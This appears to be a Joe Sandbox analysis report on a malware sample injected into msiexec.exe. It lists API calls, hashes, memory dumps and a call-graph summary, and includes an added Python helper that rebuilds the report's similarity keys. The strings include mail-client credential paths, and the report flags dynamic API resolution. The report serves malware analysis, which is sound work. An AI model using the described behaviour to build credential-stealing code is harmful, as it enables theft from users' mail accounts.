• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
• Opcode ID: 96607d1b892a217e29e001c56e79e6aa4d96b87b408ab404bd118bfc9b823be6
• Instruction ID: 7e0dbfac9da6877cb9709c139d4478ac8a8e25b92281d8fee11be9fba9630d92
• Opcode Fuzzy Hash: 96607d1b892a217e29e001c56e79e6aa4d96b87b408ab404bd118bfc9b823be6
• Instruction Fuzzy Hash: 0121B1BAE102086AEB1CDBA0EC91FEE7339EF98714F500546F604EB1D0E6B11D818758
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21BD4AEA,?,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000), ref: 21BD4B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21BD4B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,21BD4AEA,?,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000,00000001,21BD2082), ref: 21BD4B8F
Strings
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: d815b29370a022e3fee65b0f0c8693460ba21b0a0c9b8283ee40ae527108bd35
• Instruction ID: 91f65ec2bfb977834a9915157bb3175896655d7daa0423858721dfad7a33c63a
• Opcode Fuzzy Hash: d815b29370a022e3fee65b0f0c8693460ba21b0a0c9b8283ee40ae527108bd35
• Instruction Fuzzy Hash: 83F03C32940108AFDB1D9FA1C818BAEBFB9EF4A251F4041A8E945A7190DB369941CB91
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 21BD715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 21BD717F
  • Part of subcall function 21BD56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21BD5702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 21BD71A5
• _free.LIBCMT ref: 21BD71B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 21BD71C7
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 2040ee23e8656eee6c5250ec4a9f0dd4cae0f46830b8a149e4dbde54ed763260
• Instruction ID: bd192166ac2a385a42e0bedca81319b9cd9f8237d93b00dbe872ba06156609de
• Opcode Fuzzy Hash: 2040ee23e8656eee6c5250ec4a9f0dd4cae0f46830b8a149e4dbde54ed763260
• Instruction Fuzzy Hash: C70152776022557F271D8AB75C5CDBB6E7EDEC7AA4711036DF904C7640DA658C01C2B0
APIs
• GetLastError.KERNEL32(00000000,?,00000000,21BD636D,21BD5713,00000000,?,21BD2249,?,?,21BD1D66,00000000,?,?,00000000), ref: 21BD5B7F
• _free.LIBCMT ref: 21BD5BB4
• _free.LIBCMT ref: 21BD5BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD5BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD5BF1
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: ed5bd502c5bb4f05e9110e994cf17a683d5dc9762272b887435d98834c59e59b
• Instruction ID: 338a897303256edb73d0a65af3a46a30e6f8d8e819da929ddcd2066a8e1f457f
• Opcode Fuzzy Hash: ed5bd502c5bb4f05e9110e994cf17a683d5dc9762272b887435d98834c59e59b
• Instruction Fuzzy Hash: DA01F437145602BB970FEE345C94E1B2E7EDFCF6B1B610128F855D31A2EE69C9024B60
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1E9A
• lstrcatW.KERNEL32(?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EAC
• lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EB3
• lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EC8
• lstrcatW.KERNEL32(?,21BD10DF,?,21BD10DF,?,?,?,00000000), ref: 21BD1ED3
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: edae078839af56656c965a69e5de8f72883e88c394b44c30ea0b4096bd3bb6fa
• Instruction ID: 8a9ffad04394ecbdedc83c7a1aa5a0383009d34cd0ec6aaa4d9c7c89822cd63c
• Opcode Fuzzy Hash: edae078839af56656c965a69e5de8f72883e88c394b44c30ea0b4096bd3bb6fa
• Instruction Fuzzy Hash: 52F089275401107BE6296759EC95E7F7B7CEFCBB60F04441DF60C83190DB55584293B5
APIs
• _free.LIBCMT ref: 21BD91D0
  • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
  • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
• _free.LIBCMT ref: 21BD91E2
• _free.LIBCMT ref: 21BD91F4
• _free.LIBCMT ref: 21BD9206
• _free.LIBCMT ref: 21BD9218
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 71434db9813ea855e06bd112a1745eb155a0889b017f7da95136c5bc5803d0fb
• Instruction ID: 572d4642c0dd9a451c6e2cccc09464a423bb3cb36d945502e52dea2746bf7feb
• Opcode Fuzzy Hash: 71434db9813ea855e06bd112a1745eb155a0889b017f7da95136c5bc5803d0fb
• Instruction Fuzzy Hash: 76F06D73594240AB9A1CDF69E6C4C1B7FF9EF29720BA1180DF909D7524CB34F8808B60
APIs
• _free.LIBCMT ref: 21BD536F
  • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
  • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
• _free.LIBCMT ref: 21BD5381
• _free.LIBCMT ref: 21BD5394
• _free.LIBCMT ref: 21BD53A5
• _free.LIBCMT ref: 21BD53B6
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: c073cfe1817b526d0ae269f61ce3d2138c7ae4f788f54444e6e4fbf8a0e2ceab
• Instruction ID: e8ef2da5110057480655eaaaf6771c8295eeeb857ffc442d0635c08e6537c877
• Opcode Fuzzy Hash: c073cfe1817b526d0ae269f61ce3d2138c7ae4f788f54444e6e4fbf8a0e2ceab
• Instruction Fuzzy Hash: 4CF0DA729A5225DF8E0DAF25D98080A3FB5FF2DB20792128AF81197374DB7949429BC1
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 21BD4C1D
• _free.LIBCMT ref: 21BD4CE8
• _free.LIBCMT ref: 21BD4CF2
Strings
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\System32\msiexec.exe
• API String ID: 2506810119-1382325751
• Opcode ID: 4ed82afa263f87d84898ec359a9163258c77b58840b3dc0206bb1a069f8e9110
• Instruction ID: e2c35f4b35aa0ce74d7afaf48dcb7a4fd460543c80607d2d83cd52fd47e79856
• Opcode Fuzzy Hash: 4ed82afa263f87d84898ec359a9163258c77b58840b3dc0206bb1a069f8e9110
• Instruction Fuzzy Hash: AC31B272A40209EFDB1DDFA9C880D9FBBFCEF99310F14416AE94497610D7718A41CB90
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21BD6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 21BD8731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 21BD87BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 21BD87CC
• __freea.LIBCMT ref: 21BD87D5
  • Part of subcall function 21BD56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21BD5702
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: cca392908f3b6c025a4796990797c6ce8e1c5fc23e184443cd9cff5ed741aab1
• Instruction ID: f031a5bad4074c253fba2e74c92e4701913d8d943930ea277960dc347d1b617c
• Opcode Fuzzy Hash: cca392908f3b6c025a4796990797c6ce8e1c5fc23e184443cd9cff5ed741aab1
• Instruction Fuzzy Hash: DC317C72A0121AABDF1DCF64CC84EAF7BB6EF45711F064268ED08971A0E735D961CB90
APIs
• GetModuleHandleA.KERNEL32(21BDC7DD), ref: 21BDC7E6
• GetModuleHandleA.KERNEL32(?,21BDC7DD), ref: 21BDC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 21BDC860
  • Part of subcall function 21BDC803: GetProcAddress.KERNEL32(00000000,21BDC7F4), ref: 21BDC804
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID:
• API String ID: 1646373207-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: dc799d153cace5a92900d57fd9c0987d3e5963e4029e45ca7771ea3f467d9e4b
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 9101D61394524A7CBA1DD6744C03DBA9FF8DB2B673B10175EE240C71A3D9A38506C3A6
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21BD1D66,00000000,00000000,?,21BD5C88,21BD1D66,00000000,00000000,00000000,?,21BD5E85,00000006,FlsSetValue), ref: 21BD5D13
                                                                                                    • GetLastError.KERNEL32(?,21BD5C88,21BD1D66,00000000,00000000,00000000,?,21BD5E85,00000006,FlsSetValue,21BDE190,FlsSetValue,00000000,00000364,?,21BD5BC8), ref: 21BD5D1F
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21BD5C88,21BD1D66,00000000,00000000,00000000,?,21BD5E85,00000006,FlsSetValue,21BDE190,FlsSetValue,00000000), ref: 21BD5D2D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: e35fca360ca27df356efa427df3bde30081f217e7072dc616d7419eed8a440b4
                                                                                                    • Instruction ID: 5748a8cee1b8f225ccbb0748c9b408d484f6345075d57c752ad9949460d88c4e
                                                                                                    • Opcode Fuzzy Hash: e35fca360ca27df356efa427df3bde30081f217e7072dc616d7419eed8a440b4
                                                                                                    • Instruction Fuzzy Hash: 2F01F737681222ABD31D8E688C5CE463B7CEF476E1B100624FA49D7190DB25D802CBF0
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 21BD655C
                                                                                                      • Part of subcall function 21BD62BC: IsProcessorFeaturePresent.KERNEL32(00000017,21BD62AB,00000000,?,?,?,?,00000016,?,?,21BD62B8,00000000,00000000,00000000,00000000,00000000), ref: 21BD62BE
                                                                                                      • Part of subcall function 21BD62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 21BD62E0
                                                                                                      • Part of subcall function 21BD62BC: TerminateProcess.KERNEL32(00000000), ref: 21BD62E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                    • String ID: *?$.
                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction ID: 8fe02dd9e9990e1fc09124dcdefb3424ddd44c25939106c62a23f2e3a97c1798
                                                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction Fuzzy Hash: 77519176E0020AAFDF0DCFB8C880AADBBF5EF59314F248169D854E7355E6359A418B90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: : $Se.
                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction ID: c19264670d49b6e7d8fd5cbcd29f93d23c1eb1fb8c4345d12f2d8dae55d2280d
                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction Fuzzy Hash: 8D11E7B6A00249AECB19CFA8D840BDDFBFCEF1D304F504056E545E7222E6705B02C765
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21BD2903
                                                                                                      • Part of subcall function 21BD35D2: RaiseException.KERNEL32(?,?,?,21BD2925,00000000,00000000,00000000,?,?,?,?,?,21BD2925,?,21BE21B8), ref: 21BD3632
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21BD2920
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: 8f093a7f3b17d08a4cb095f9c002bf7ad6e456174fc2264ed28ec71bb2ffe199
                                                                                                    • Instruction ID: 13cddb696a3b678d8298d4936889e7bc425ace3384952d62bf1aaf6b7c29b497
                                                                                                    • Opcode Fuzzy Hash: 8f093a7f3b17d08a4cb095f9c002bf7ad6e456174fc2264ed28ec71bb2ffe199
                                                                                                    • Instruction Fuzzy Hash: 7CF02837D0024EBB8F0CEAA5EC4595D777C9F15790B9042F4FA18924A0EF32EA16C5C1
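The "API ID" line in each function block above is the key Joe Sandbox uses for its Similarity section, and it is worth being able to rebuild it when clustering dumps from several reports or hunting for the same dynamic-resolution stub (GetModuleHandle followed by GetProcAddress) elsewhere. The script below is an added example, not code from Joe Sandbox or from the sample. The tokenisation rule it applies is an assumption inferred from the four blocks on this page: split each API name on CamelCase boundaries, drop tokens of three characters or fewer (Get, Is, Ex, W, A, Cxx), count tokens across the main calls and the "Part of subcall function" calls, group tokens by count with the highest count first, sort each group, and join the groups with "$". The argument lists in the embedded input are abridged copies of the lines above; the cut-off `MIN_TOKEN_LEN` and the helper names are hypothetical.

```python
"""Rebuild the Joe Sandbox 'API ID' key from a function block's API list.

Added example; not code from Joe Sandbox or from the sample. The tokenisation
rule is an assumption inferred from the four function blocks on the page.
"""
import re
from collections import Counter

# Constructed input: the 'APIs' lines of four function blocks on this page,
# keyed by the API ID the report prints for them (argument lists abridged).
FUNCTION_BLOCKS = {
    "AddressHandleModuleProc": """
• GetModuleHandleA.KERNEL32(21BDC7DD), ref: 21BDC7E6
• GetModuleHandleA.KERNEL32(?,21BDC7DD), ref: 21BDC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 21BDC860
  • Part of subcall function 21BDC803: GetProcAddress.KERNEL32(00000000,21BDC7F4), ref: 21BDC804
""",
    "LibraryLoad$ErrorLast": """
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21BD1D66), ref: 21BD5D13
• GetLastError.KERNEL32(?,21BD5C88), ref: 21BD5D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?), ref: 21BD5D2D
""",
    "Process$CurrentFeaturePresentProcessorTerminate_free": """
• _free.LIBCMT ref: 21BD655C
  • Part of subcall function 21BD62BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 21BD62BE
  • Part of subcall function 21BD62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 21BD62E0
  • Part of subcall function 21BD62BC: TerminateProcess.KERNEL32(00000000), ref: 21BD62E7
""",
    "Exception@8Throw$ExceptionRaise": """
• __CxxThrowException@8.LIBVCRUNTIME ref: 21BD2903
  • Part of subcall function 21BD35D2: RaiseException.KERNEL32(?,?,?,21BD2925), ref: 21BD3632
• __CxxThrowException@8.LIBVCRUNTIME ref: 21BD2920
""",
}

# One API line: optional subcall prefix, then the name up to the '.MODULE' suffix.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_][\w@]*)"
)
# Assumed cut-off: tokens shorter than this (Get, Is, Ex, W, Cxx) never appear in a key.
MIN_TOKEN_LEN = 4


def api_names(block: str) -> list[str]:
    """Return the API names in a block, subcall lines included, in page order."""
    return [m.group(1) for line in block.splitlines() if (m := API_LINE.match(line))]


def tokens(api_name: str) -> list[str]:
    """Split one API name into the tokens the key is built from."""
    stripped = api_name.lstrip("_")
    if not any(c.isupper() for c in stripped):
        return [api_name]  # CRT names such as _free and _strlen stay whole
    parts = re.findall(r"[A-Z][^A-Z]*", stripped)  # CamelCase split, '@8' stays attached
    return [p for p in parts if len(p) >= MIN_TOKEN_LEN]


def api_id(block: str) -> str:
    """Build the key: token groups by descending count, each sorted, joined with '$'."""
    counts = Counter(t for name in api_names(block) for t in tokens(name))
    groups = []
    for n in sorted(set(counts.values()), reverse=True):
        groups.append("".join(sorted(t for t, c in counts.items() if c == n)))
    return "$".join(groups)


def resolves_apis_dynamically(block: str) -> bool:
    """True when a function pairs GetProcAddress with a module lookup, which is
    the 'dynamically determine API calls' behaviour the report flags."""
    names = set(api_names(block))
    return "GetProcAddress" in names and any(
        n.startswith(("GetModuleHandle", "LoadLibrary")) for n in names
    )


if __name__ == "__main__":
    for expected, block in FUNCTION_BLOCKS.items():
        got = api_id(block)
        print("ok " if got == expected else "BAD", got, "dynamic" if resolves_apis_dynamically(block) else "")
```

Running the script prints "ok" for all four blocks, which is the evidence for the inferred rule; a block from another report that does not round-trip is the signal that the rule is incomplete rather than that the report is wrong. Note that the numeric "API String ID" is a separate hash and is not reconstructed here.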

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:5.5%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:2.6%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:80
                                                                                                    execution_graph (rendering of the interactive call graph; the flattened node/edge list, which is cut off in the source, is omitted). Nodes labelled "N API calls" (for example 416760, 4446ce, 44081d, 439811, 438c4e) stand for a called function rather than listing its calls. API-labelled nodes recoverable from the listing, by address:
                                                                                                    • 4044a4 LoadLibraryW -> 4044cf GetProcAddress -> 4044e8 FreeLibrary; 404507 MessageBoxW
                                                                                                    • 4148b6 FindResourceW -> 4148cf SizeofResource -> 4148e0 LoadResource -> 4148ee LockResource
                                                                                                    • 412794 SetErrorMode, GetModuleHandleW, EnumResourceTypesW; 414b9e GetProcAddress
                                                                                                    • 412863 CoInitialize; 4123e2 GetModuleHandleW, RegisterClassW, CreateWindowExW; 412873 ShowWindow, UpdateWindow, LoadAcceleratorsW, GetMessageW; 4128d0 TranslateAcceleratorW; 412941 GetMessageW; 4128fd, 412909, 41291f IsDialogMessageW; 41292b TranslateMessage, DispatchMessageW; 412957 CoUninitialize
                                                                                                    • 417570 SetFilePointer; 41760a ReadFile; 41759c, 4175a8, 417627 GetLastError; 4175d6 CloseHandle; 4175ce Sleep; 417bf6 UnmapViewOfFile, CloseHandle
                                                                                                    • 41457f GetPrivateProfileIntW; 4143f1 memset, _itow, WritePrivateProfileStringW
                                                                                                    • 4152c7 malloc; 415308 free; 40b1ab free; 412465 memset, ??2@YAPAXI; 40e820 memset, ??2@YAPAXI; 4125b6 ??3@YAXPAX, DeleteObject; 40ada2 _wcsicmp; 41f1f5, 41c06f memcmp; 415d23 __aullrem, __aulldvrm; 44deb5 FreeLibrary
??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38445->38528 38517 444722 38449->38517 38453 41259b wcscpy 38453->38394 38533 40b1ab free free 38454->38533 38458 40a9ce malloc memcpy free free 38460 40ac5c 38458->38460 38459 40ad4b 38468 40ad76 38459->38468 38539 40a9ce 38459->38539 38460->38458 38460->38459 38462 40acf0 38460->38462 38463 40ace7 free 38460->38463 38460->38468 38537 40a8d0 7 API calls 38460->38537 38462->38460 38538 4099f4 malloc memcpy free 38462->38538 38463->38460 38534 40aa04 38468->38534 38469 40ada2 38470 40adc9 38469->38470 38471 40adaa 38469->38471 38470->38399 38470->38400 38471->38470 38472 40adb3 _wcsicmp 38471->38472 38472->38470 38472->38471 38547 40dce0 38473->38547 38475 40dd3a GetModuleHandleW 38552 40dba7 38475->38552 38479 40dce0 3 API calls 38478->38479 38480 40db99 38479->38480 38624 40dae1 38480->38624 38638 402f3a 38483->38638 38485 412766 38485->38403 38485->38410 38486 4126d3 _wcsicmp 38487 4126a8 38486->38487 38487->38485 38487->38486 38489 41270a 38487->38489 38672 4125f8 7 API calls 38487->38672 38489->38485 38641 411ac5 38489->38641 38499->38415 38500->38408 38501->38413 38503 40b640 38502->38503 38504 40b639 free 38502->38504 38505 40b1ab free free 38503->38505 38504->38503 38505->38389 38507 40a83b GetSystemDirectoryW 38506->38507 38508 40a84c wcscpy 38506->38508 38507->38508 38513 409719 wcslen 38508->38513 38511 40a881 LoadLibraryW 38512 40a886 38511->38512 38512->38438 38512->38441 38514 409724 38513->38514 38515 409739 wcscat LoadLibraryW 38513->38515 38514->38515 38516 40972c wcscat 38514->38516 38515->38511 38515->38512 38516->38515 38518 444732 38517->38518 38519 444728 DeleteObject 38517->38519 38529 409cc3 38518->38529 38519->38518 38521 412551 38522 4010f9 38521->38522 38523 401130 38522->38523 38524 401134 GetModuleHandleW LoadIconW 38523->38524 38525 401107 wcsncat 38523->38525 38526 40a7be 38524->38526 38525->38523 38527 40a7d2 38526->38527 38527->38453 38527->38527 38528->38449 38532 409bfd memset wcscpy 38529->38532 
38531 409cdb CreateFontIndirectW 38531->38521 38532->38531 38533->38460 38535 40aa14 38534->38535 38536 40aa0a free 38534->38536 38535->38469 38536->38535 38537->38460 38538->38462 38540 40a9e7 38539->38540 38541 40a9dc free 38539->38541 38546 4099f4 malloc memcpy free 38540->38546 38542 40a9f3 38541->38542 38545 40a8d0 7 API calls 38542->38545 38544 40a9f2 38544->38542 38545->38468 38546->38544 38571 409bca GetModuleFileNameW 38547->38571 38549 40dce6 wcsrchr 38550 40dcf5 38549->38550 38551 40dcf9 wcscat 38549->38551 38550->38551 38551->38475 38572 44db70 38552->38572 38556 40dbfd 38575 4447d9 38556->38575 38559 40dc34 wcscpy wcscpy 38601 40d6f5 38559->38601 38560 40dc1f wcscpy 38560->38559 38563 40d6f5 3 API calls 38564 40dc73 38563->38564 38565 40d6f5 3 API calls 38564->38565 38566 40dc89 38565->38566 38567 40d6f5 3 API calls 38566->38567 38568 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38567->38568 38607 40da80 38568->38607 38571->38549 38573 40dbb4 memset memset 38572->38573 38574 409bca GetModuleFileNameW 38573->38574 38574->38556 38577 4447f4 38575->38577 38576 40dc1b 38576->38559 38576->38560 38577->38576 38578 444807 ??2@YAPAXI 38577->38578 38579 44481f 38578->38579 38580 444873 _snwprintf 38579->38580 38581 4448ab wcscpy 38579->38581 38614 44474a 8 API calls 38580->38614 38583 4448bb 38581->38583 38615 44474a 8 API calls 38583->38615 38584 4448a7 38584->38581 38584->38583 38586 4448cd 38616 44474a 8 API calls 38586->38616 38588 4448e2 38617 44474a 8 API calls 38588->38617 38590 4448f7 38618 44474a 8 